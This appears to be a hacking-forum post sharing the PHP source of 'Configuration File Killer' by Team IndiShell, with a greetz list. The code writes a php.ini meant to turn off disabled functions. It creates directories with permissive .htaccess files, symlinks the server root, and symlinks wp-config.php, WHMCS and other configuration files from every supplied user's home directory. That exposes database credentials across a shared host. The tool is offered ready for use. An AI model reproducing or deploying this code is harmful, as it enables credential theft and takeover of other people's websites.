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Locked Configuration File Killer


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This is the hidden content, please
Configration File Killer Latest Fuctions :

  • Genrate php.ini
  • Mannual Symlinking
  • Automated Mass Symlink
  • perl Based Symlink


This is the hidden content, please

[LENGUAJE=php]<?php $head = '

--==[[Configuration File Killer By Team IndiShell]]==-- '; ?> <?php echo $head ; echo '
--==[[ Configuration File Killer By Team IndiShell ]]==--

-==[[Greetz to]]==--

Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell

cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk

Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL

--==[[Dedicated to]]==--

# SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #

--==[[interface Desgined By]]==--

Deepika Kaushik


'; ?>

Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_

The button given below generates php.ini file :)

The button given below extract usernames for symlink :)

<?php if(isset($_POST['ini'])) { $r=fopen('php.ini','w'); $rr=" disbale_functions=none "; fwrite($r,$rr); $link="open this link in new tab to run PHP.INI"; echo $link; } ?> <?php if(isset($_POST['usre'])){ ?>


<?php } ?> <?php error_reporting(0); echo ""; if(isset($_POST['su'])) { mkdir('Indishell',0777);$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$g = fopen('Indishell/.htaccess','w');fwrite($g,$rr);$indishell = symlink("/","Indishell/root"); $rt=" OwN3d"; echo "Bhai ji .... check link given below for / folder symlink

$rt"; $dir=mkdir('INDISHELL',0777); $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f = fopen('INDISHELL/.htaccess','w'); fwrite($f,$r); $consym="configuration files"; echo "

The link given below for configuration file symlink...open it, once processing finish

$consym"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php"); foreach($usr as $uss ) { $us=trim($uss); foreach($configuration as $c) { $rs="/home/".$us."/public_html/".$c; $r="INDISHELL/".$us." .. ".$c; symlink($rs,$r); } } } ?>[/LENGUAJE]

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